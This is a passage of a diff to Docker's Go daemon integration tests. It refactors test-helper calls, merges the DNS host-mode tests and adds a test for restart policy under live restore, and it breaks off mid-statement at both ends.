- comment := check.Commentf("%s should stay mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) - c.Assert(strings.Contains(string(mountOut), id), check.Equals, true, comment) + if !strings.Contains(string(mountOut), id) { + skipMountCheck = true + } // restart daemon. - if err := s.d.Restart("--live-restore"); err != nil { - c.Fatal(err) - } + s.d.Start(c, "--live-restore") // container should be running. out, err = s.d.Cmd("inspect", "--format={{.State.Running}}", id) @@ -2170,23 +2065,23 @@ func (s *DockerDaemonSuite) TestCleanupMountsAfterDaemonCrash(c *check.C) { out, err = s.d.Cmd("stop", id) c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + if skipMountCheck { + return + } // Now, container mounts should be gone. mountOut, err = ioutil.ReadFile("/proc/self/mountinfo") c.Assert(err, check.IsNil, check.Commentf("Output: %s", mountOut)) - comment = check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.folder, mountOut) + comment := check.Commentf("%s is still mounted from older daemon start:\nDaemon root repository %s\n%s", id, s.d.Root, mountOut) c.Assert(strings.Contains(string(mountOut), id), check.Equals, false, comment) } // TestDaemonRestartWithUnpausedRunningContainer requires live restore of running containers. 
func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *check.C) { - // TODO(mlaventure): Not sure what would the exit code be on windows testRequires(t, DaemonIsLinux) - if err := s.d.StartWithBusybox("--live-restore"); err != nil { - t.Fatal(err) - } + s.d.StartWithBusybox(t, "--live-restore") cid, err := s.d.Cmd("run", "-d", "--name", "test", "busybox", "top") - defer s.d.Stop() + defer s.d.Stop(t) if err != nil { t.Fatal(cid, err) } @@ -2208,9 +2103,10 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che // resume the container result := icmd.RunCommand( ctrBinary, - "--address", "unix:///var/run/docker/libcontainerd/docker-containerd.sock", - "containers", "resume", cid) - t.Assert(result, icmd.Matches, icmd.Success) + "--address", "/var/run/docker/containerd/docker-containerd.sock", + "--namespace", moby_daemon.ContainersNamespace, + "tasks", "resume", cid) + result.Assert(t, icmd.Success) // Give time to containerd to process the command if we don't // the resume event might be received after we do the inspect @@ -2220,9 +2116,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che }, checker.Equals, 0) // restart the daemon - if err := s.d.Start("--live-restore"); err != nil { - t.Fatal(err) - } + s.d.Start(t, "--live-restore") // Check that we've got the correct status out, err := s.d.Cmd("inspect", "-f", "{{.State.Status}}", cid) @@ -2241,8 +2135,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithUnpausedRunningContainer(t *che // this ensures that the old, pre gh#16032 functionality continues on func (s *DockerDaemonSuite) TestRunLinksChanged(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support links - err := s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c) out, err := s.d.Cmd("run", "-d", "--name=test", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2260,17 +2153,19 @@ func (s *DockerDaemonSuite) 
TestRunLinksChanged(c *check.C) { c.Assert(err, check.NotNil, check.Commentf(out)) c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") - err = s.d.Restart() - c.Assert(err, check.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("start", "-a", "test2") c.Assert(err, check.NotNil, check.Commentf(out)) c.Assert(out, check.Not(checker.Contains), "1 packets transmitted, 1 packets received") } func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) { - testRequires(c, DaemonIsLinux, NotPpc64le) + testRequires(c, DaemonIsLinux) - infoLog := "\x1b[34mINFO\x1b" + infoLog := "\x1b[36mINFO\x1b" + + b := bytes.NewBuffer(nil) + done := make(chan bool) p, tty, err := pty.Open() c.Assert(err, checker.IsNil) @@ -2279,24 +2174,43 @@ func (s *DockerDaemonSuite) TestDaemonStartWithoutColors(c *check.C) { p.Close() }() - b := bytes.NewBuffer(nil) - go io.Copy(b, p) + go func() { + io.Copy(b, p) + done <- true + }() // Enable coloring explicitly s.d.StartWithLogFile(tty, "--raw-logs=false") - s.d.Stop() + s.d.Stop(c) + // Wait for io.Copy() before checking output + <-done c.Assert(b.String(), checker.Contains, infoLog) b.Reset() + // "tty" is already closed in prev s.d.Stop(), + // we have to close the other side "p" and open another pair of + // pty for the next test. 
+ p.Close() + p, tty, err = pty.Open() + c.Assert(err, checker.IsNil) + + go func() { + io.Copy(b, p) + done <- true + }() + // Disable coloring explicitly s.d.StartWithLogFile(tty, "--raw-logs=true") - s.d.Stop() + s.d.Stop(c) + // Wait for io.Copy() before checking output + <-done + c.Assert(b.String(), check.Not(check.Equals), "") c.Assert(b.String(), check.Not(checker.Contains), infoLog) } func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) { - testRequires(c, DaemonIsLinux, NotPpc64le) + testRequires(c, DaemonIsLinux) debugLog := "\x1b[37mDEBU\x1b" @@ -2311,7 +2225,7 @@ func (s *DockerDaemonSuite) TestDaemonDebugLog(c *check.C) { go io.Copy(b, p) s.d.StartWithLogFile(tty, "--debug") - s.d.Stop() + s.d.Stop(c) c.Assert(b.String(), checker.Contains, debugLog) } @@ -2333,8 +2247,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { // --log-level needs to be set so that d.Start() doesn't add --debug causing // a conflict with the config - err = s.d.Start("--config-file", configFilePath, "--log-level=info") - c.Assert(err, checker.IsNil) + s.d.Start(c, "--config-file", configFilePath, "--log-level=info") // daemon config file daemonConfig = `{ @@ -2351,7 +2264,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { _, err = configFile.Write([]byte(daemonConfig)) c.Assert(err, checker.IsNil) - err = s.d.reloadConfig() + err = s.d.ReloadConfig() c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config")) out, err := s.d.Cmd("info") @@ -2363,8 +2276,7 @@ func (s *DockerDaemonSuite) TestDaemonDiscoveryBackendConfigReload(c *check.C) { // Test for #21956 func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) { - err := s.d.StartWithBusybox("--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514") - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--log-driver=syslog", "--log-opt=syslog-address=udp://127.0.0.1:514") out, err := s.d.Cmd("run", "-d", 
"--log-driver=json-file", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf(out)) @@ -2377,11 +2289,12 @@ func (s *DockerDaemonSuite) TestDaemonLogOptions(c *check.C) { // Test case for #20936, #22443 func (s *DockerDaemonSuite) TestDaemonMaxConcurrency(c *check.C) { - c.Assert(s.d.Start("--max-concurrent-uploads=6", "--max-concurrent-downloads=8"), check.IsNil) + s.d.Start(c, "--max-concurrent-uploads=6", "--max-concurrent-downloads=8") expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 6"` expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) } @@ -2399,11 +2312,12 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) { daemonConfig := `{ "max-concurrent-downloads" : 8 }` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 8"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) @@ -2413,13 +2327,15 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFile(c *check.C) { fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) + // unix.Kill(s.d.cmd.Process.Pid, 
unix.SIGHUP) time.Sleep(3 * time.Second) expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 7"` expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 9"` - content, _ = ioutil.ReadFile(s.d.logFile.Name()) + content, err = s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) } @@ -2437,11 +2353,12 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec daemonConfig := `{ "max-concurrent-uploads" : null }` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) expectedMaxConcurrentUploads := `level=debug msg="Max Concurrent Uploads: 5"` expectedMaxConcurrentDownloads := `level=debug msg="Max Concurrent Downloads: 3"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) @@ -2451,13 +2368,15 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) + // unix.Kill(s.d.cmd.Process.Pid, unix.SIGHUP) time.Sleep(3 * time.Second) expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 1"` expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` - content, _ = ioutil.ReadFile(s.d.logFile.Name()) + content, err = s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) 
c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) @@ -2467,62 +2386,44 @@ func (s *DockerDaemonSuite) TestDaemonMaxConcurrencyWithConfigFileReload(c *chec fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) time.Sleep(3 * time.Second) expectedMaxConcurrentUploads = `level=debug msg="Reset Max Concurrent Uploads: 5"` expectedMaxConcurrentDownloads = `level=debug msg="Reset Max Concurrent Downloads: 3"` - content, _ = ioutil.ReadFile(s.d.logFile.Name()) + content, err = s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMaxConcurrentUploads) c.Assert(string(content), checker.Contains, expectedMaxConcurrentDownloads) } func (s *DockerDaemonSuite) TestBuildOnDisabledBridgeNetworkDaemon(c *check.C) { - err := s.d.StartWithBusybox("-b=none", "--iptables=false") - c.Assert(err, check.IsNil) - s.d.c.Logf("dockerBinary %s", dockerBinary) - out, code, err := s.d.buildImageWithOut("busyboxs", - `FROM busybox - RUN cat /etc/hosts`, false) - comment := check.Commentf("Failed to build image. output %s, exitCode %d, err %v", out, code, err) - c.Assert(err, check.IsNil, comment) - c.Assert(code, check.Equals, 0, comment) + s.d.StartWithBusybox(c, "-b=none", "--iptables=false") + + result := cli.BuildCmd(c, "busyboxs", cli.Daemon(s.d), + build.WithDockerfile(` + FROM busybox + RUN cat /etc/hosts`), + build.WithoutCache, + ) + comment := check.Commentf("Failed to build image. 
output %s, exitCode %d, err %v", result.Combined(), result.ExitCode, result.Error) + c.Assert(result.Error, check.IsNil, comment) + c.Assert(result.ExitCode, check.Equals, 0, comment) } // Test case for #21976 -func (s *DockerDaemonSuite) TestDaemonDNSInHostMode(c *check.C) { +func (s *DockerDaemonSuite) TestDaemonDNSFlagsInHostMode(c *check.C) { testRequires(c, SameHostDaemon, DaemonIsLinux) - err := s.d.StartWithBusybox("--dns", "1.2.3.4") - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c, "--dns", "1.2.3.4", "--dns-search", "example.com", "--dns-opt", "timeout:3") expectedOutput := "nameserver 1.2.3.4" out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) -} - -// Test case for #21976 -func (s *DockerDaemonSuite) TestDaemonDNSSearchInHostMode(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) - - err := s.d.StartWithBusybox("--dns-search", "example.com") - c.Assert(err, checker.IsNil) - - expectedOutput := "search example.com" - out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + expectedOutput = "search example.com" c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) -} - -// Test case for #21976 -func (s *DockerDaemonSuite) TestDaemonDNSOptionsInHostMode(c *check.C) { - testRequires(c, SameHostDaemon, DaemonIsLinux) - - err := s.d.StartWithBusybox("--dns-opt", "timeout:3") - c.Assert(err, checker.IsNil) - - expectedOutput := "options timeout:3" - out, _ := s.d.Cmd("run", "--net=host", "busybox", "cat", "/etc/resolv.conf") + expectedOutput = "options timeout:3" c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out)) } @@ -2549,8 +2450,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 
0644) - err = s.d.StartWithBusybox("--config-file", configName) - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--config-file", configName) // Run with default runtime out, err := s.d.Cmd("run", "--rm", "busybox", "ls") @@ -2577,7 +2477,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) // Give daemon time to reload config <-time.After(1 * time.Second) @@ -2606,11 +2506,12 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) // Give daemon time to reload config <-time.After(1 * time.Second) - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, `file configuration validation failed (runtime name 'runc' is reserved)`) // Check that we can select a default runtime @@ -2631,7 +2532,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } ` ioutil.WriteFile(configName, []byte(config), 0644) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) // Give daemon time to reload config <-time.After(1 * time.Second) @@ -2645,8 +2546,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromConfigFile(c *check.C) { } func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { - err := s.d.StartWithBusybox("--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") - c.Assert(err, check.IsNil) + s.d.StartWithBusybox(c, "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") // Run with default runtime out, err := s.d.Cmd("run", "--rm", "busybox", "ls") @@ -2666,9 
+2566,8 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { c.Assert(out, checker.Contains, "/usr/local/bin/vm-manager: no such file or directory") // Start a daemon without any extra runtimes - s.d.Stop() - err = s.d.StartWithBusybox() - c.Assert(err, check.IsNil) + s.d.Stop(c) + s.d.StartWithBusybox(c) // Run with default runtime out, err = s.d.Cmd("run", "--rm", "--runtime=runc", "busybox", "ls") @@ -2685,17 +2584,16 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { c.Assert(out, checker.Contains, "Unknown runtime specified oci") // Check that we can't override the default runtime - s.d.Stop() - err = s.d.Start("--add-runtime", "runc=my-runc") - c.Assert(err, check.NotNil) + s.d.Stop(c) + c.Assert(s.d.StartWithError("--add-runtime", "runc=my-runc"), checker.NotNil) - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, `runtime name 'runc' is reserved`) // Check that we can select a default runtime - s.d.Stop() - err = s.d.StartWithBusybox("--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") - c.Assert(err, check.IsNil) + s.d.Stop(c) + s.d.StartWithBusybox(c, "--default-runtime=vm", "--add-runtime", "oci=docker-runc", "--add-runtime", "vm=/usr/local/bin/vm-manager") out, err = s.d.Cmd("run", "--rm", "busybox", "ls") c.Assert(err, check.NotNil, check.Commentf(out)) @@ -2707,8 +2605,7 @@ func (s *DockerDaemonSuite) TestRunWithRuntimeFromCommandLine(c *check.C) { } func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) // top1 will exist after daemon restarts out, err := s.d.Cmd("run", "-d", "--name", "top1", "busybox:latest", "top") @@ -2722,8 +2619,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) 
c.Assert(out, checker.Contains, "top2", check.Commentf("top2 should be running")) // now restart daemon gracefully - err = s.d.Restart() - c.Assert(err, checker.IsNil) + s.d.Restart(c) out, err = s.d.Cmd("ps", "-a") c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) @@ -2732,12 +2628,18 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithAutoRemoveContainer(c *check.C) } func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { - err := s.d.StartWithBusybox() - c.Assert(err, checker.IsNil) + s.d.StartWithBusybox(c) containerName := "error-values" // Make a container with both a non 0 exit code and an error message - out, err := s.d.Cmd("run", "--name", containerName, "busybox", "toto") + // We explicitly disable `--init` for this test, because `--init` is enabled by default + // on "experimental". Enabling `--init` results in a different behavior; because the "init" + // process itself is PID1, the container does not fail on _startup_ (i.e., `docker-init` starting), + // but directly after. The exit code of the container is still 127, but the Error Message is not + // captured, so `.State.Error` is empty. + // See the discussion on https://github.com/docker/docker/pull/30227#issuecomment-274161426, + // and https://github.com/docker/docker/pull/26061#r78054578 for more information. 
+ out, err := s.d.Cmd("run", "--name", containerName, "--init=false", "busybox", "toto") c.Assert(err, checker.NotNil) // Check that those values were saved on disk @@ -2746,13 +2648,13 @@ func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(out, checker.Equals, "127") - out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) - out = strings.TrimSpace(out) + errMsg1, err := s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) + errMsg1 = strings.TrimSpace(errMsg1) c.Assert(err, checker.IsNil) + c.Assert(errMsg1, checker.Contains, "executable file not found") // now restart daemon - err = s.d.Restart() - c.Assert(err, checker.IsNil) + s.d.Restart(c) // Check that those values are still around out, err = s.d.Cmd("inspect", "-f", "{{.State.ExitCode}}", containerName) @@ -2763,86 +2665,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartSaveContainerExitCode(c *check.C) { out, err = s.d.Cmd("inspect", "-f", "{{.State.Error}}", containerName) out = strings.TrimSpace(out) c.Assert(err, checker.IsNil) -} - -func (s *DockerDaemonSuite) TestDaemonBackcompatPre17Volumes(c *check.C) { - testRequires(c, SameHostDaemon) - d := s.d - err := d.StartWithBusybox() - c.Assert(err, checker.IsNil) - - // hack to be able to side-load a container config - out, err := d.Cmd("create", "busybox:latest") - c.Assert(err, checker.IsNil, check.Commentf(out)) - id := strings.TrimSpace(out) - - out, err = d.Cmd("inspect", "--type=image", "--format={{.ID}}", "busybox:latest") - c.Assert(err, checker.IsNil, check.Commentf(out)) - c.Assert(d.Stop(), checker.IsNil) - <-d.wait - - imageID := strings.TrimSpace(out) - volumeID := stringid.GenerateNonCryptoID() - vfsPath := filepath.Join(d.root, "vfs", "dir", volumeID) - c.Assert(os.MkdirAll(vfsPath, 0755), checker.IsNil) - - config := []byte(` - { - "ID": "` + id + `", - "Name": "hello", - "Driver": "` + d.storageDriver + `", - "Image": "` + imageID + `", - "Config": 
{"Image": "busybox:latest"}, - "NetworkSettings": {}, - "Volumes": { - "/bar":"/foo", - "/foo": "` + vfsPath + `", - "/quux":"/quux" - }, - "VolumesRW": { - "/bar": true, - "/foo": true, - "/quux": false - } - } - `) - - configPath := filepath.Join(d.root, "containers", id, "config.v2.json") - err = ioutil.WriteFile(configPath, config, 600) - err = d.Start() - c.Assert(err, checker.IsNil) - - out, err = d.Cmd("inspect", "--type=container", "--format={{ json .Mounts }}", id) - c.Assert(err, checker.IsNil, check.Commentf(out)) - type mount struct { - Name string - Source string - Destination string - Driver string - RW bool - } - - ls := []mount{} - err = json.NewDecoder(strings.NewReader(out)).Decode(&ls) - c.Assert(err, checker.IsNil) - - expected := []mount{ - {Source: "/foo", Destination: "/bar", RW: true}, - {Name: volumeID, Destination: "/foo", RW: true}, - {Source: "/quux", Destination: "/quux", RW: false}, - } - c.Assert(ls, checker.HasLen, len(expected)) - - for _, m := range ls { - var matched bool - for _, x := range expected { - if m.Source == x.Source && m.Destination == x.Destination && m.RW == x.RW || m.Name != x.Name { - matched = true - break - } - } - c.Assert(matched, checker.True, check.Commentf("did find match for %+v", m)) - } + c.Assert(out, checker.Equals, errMsg1) } func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { @@ -2858,17 +2681,17 @@ func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { c.Assert(cmd.Run(), checker.IsNil) // custom one - c.Assert(s.d.StartWithBusybox("--userland-proxy-path", newProxyPath), checker.IsNil) + s.d.StartWithBusybox(c, "--userland-proxy-path", newProxyPath) out, err := s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") c.Assert(err, checker.IsNil, check.Commentf(out)) // try with the original one - c.Assert(s.d.Restart("--userland-proxy-path", dockerProxyPath), checker.IsNil) + s.d.Restart(c, "--userland-proxy-path", dockerProxyPath) out, err = s.d.Cmd("run", 
"-p", "5000:5000", "busybox:latest", "true") c.Assert(err, checker.IsNil, check.Commentf(out)) // not exist - c.Assert(s.d.Restart("--userland-proxy-path", "/does/not/exist"), checker.IsNil) + s.d.Restart(c, "--userland-proxy-path", "/does/not/exist") out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") c.Assert(err, checker.NotNil, check.Commentf(out)) c.Assert(out, checker.Contains, "driver failed programming external connectivity on endpoint") @@ -2878,21 +2701,21 @@ func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { // Test case for #22471 func (s *DockerDaemonSuite) TestDaemonShutdownTimeout(c *check.C) { testRequires(c, SameHostDaemon) - - c.Assert(s.d.StartWithBusybox("--shutdown-timeout=3"), check.IsNil) + s.d.StartWithBusybox(c, "--shutdown-timeout=3") _, err := s.d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGINT) + c.Assert(s.d.Signal(unix.SIGINT), checker.IsNil) select { - case <-s.d.wait: + case <-s.d.Wait: case <-time.After(5 * time.Second): } - expectedMessage := `level=debug msg="start clean shutdown of all containers with a 3 seconds timeout..."` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + expectedMessage := `level=debug msg="daemon configured with a 3 seconds minimum shutdown timeout"` + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMessage) } @@ -2909,7 +2732,7 @@ func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C) daemonConfig := `{ "shutdown-timeout" : 8 }` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) configFile, err = os.Create(configFilePath) c.Assert(err, checker.IsNil) @@ -2917,38 +2740,43 @@ func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c 
*check.C) fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) select { - case <-s.d.wait: + case <-s.d.Wait: case <-time.After(3 * time.Second): } expectedMessage := `level=debug msg="Reset Shutdown Timeout: 5"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMessage) } // Test case for 29342 func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) { testRequires(c, DaemonIsLinux) - s.d.StartWithBusybox("--live-restore") + s.d.StartWithBusybox(c, "--live-restore") - out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && top") + out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && touch /adduser_end && top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - s.d.waitRun("top") + s.d.WaitRun("top") + + // Wait for shell command to be completed + _, err = s.d.Cmd("exec", "top", "sh", "-c", `for i in $(seq 1 5); do if [ -e /adduser_end ]; then rm -f /adduser_end && break; else sleep 1 && false; fi; done`) + c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for shell command to be completed")) out1, err := s.d.Cmd("exec", "-u", "test", "top", "id") // uid=100(test) gid=101(test) groups=101(test) c.Assert(err, check.IsNil, check.Commentf("Output: %s", out1)) // restart daemon. 
- s.d.Restart("--live-restore") + s.d.Restart(c, "--live-restore") out2, err := s.d.Cmd("exec", "-u", "test", "top", "id") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out2)) - c.Assert(out1, check.Equals, out2, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2)) + c.Assert(out2, check.Equals, out1, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2)) out, err = s.d.Cmd("stop", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) @@ -2956,20 +2784,20 @@ func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) { func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) { testRequires(c, DaemonIsLinux, overlayFSSupported, SameHostDaemon) - s.d.StartWithBusybox("--live-restore", "--storage-driver", "overlay") + s.d.StartWithBusybox(c, "--live-restore", "--storage-driver", "overlay") out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - s.d.waitRun("top") + s.d.WaitRun("top") // restart daemon. 
- s.d.Restart("--live-restore", "--storage-driver", "overlay") + s.d.Restart(c, "--live-restore", "--storage-driver", "overlay") out, err = s.d.Cmd("stop", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) // test if the rootfs mountpoint still exist - mountpoint, err := s.d.inspectFilter("top", ".GraphDriver.Data.MergedDir") + mountpoint, err := s.d.InspectField("top", ".GraphDriver.Data.MergedDir") c.Assert(err, check.IsNil) f, err := os.Open("/proc/self/mountinfo") c.Assert(err, check.IsNil) @@ -2984,5 +2812,320 @@ func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) { out, err = s.d.Cmd("rm", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) +} + +// #29598 +func (s *DockerDaemonSuite) TestRestartPolicyWithLiveRestore(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d.StartWithBusybox(c, "--live-restore") + + out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("output: %s", out)) + id := strings.TrimSpace(out) + + type state struct { + Running bool + StartedAt time.Time + } + out, err = s.d.Cmd("inspect", "-f", "{{json .State}}", id) + c.Assert(err, checker.IsNil, check.Commentf("output: %s", out)) + + var origState state + err = json.Unmarshal([]byte(strings.TrimSpace(out)), &origState) + c.Assert(err, checker.IsNil) + + s.d.Restart(c, "--live-restore") + + pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", id) + c.Assert(err, check.IsNil) + pidint, err := strconv.Atoi(strings.TrimSpace(pid)) + c.Assert(err, check.IsNil) + c.Assert(pidint, checker.GreaterThan, 0) + c.Assert(unix.Kill(pidint, unix.SIGKILL), check.IsNil) + + ticker := 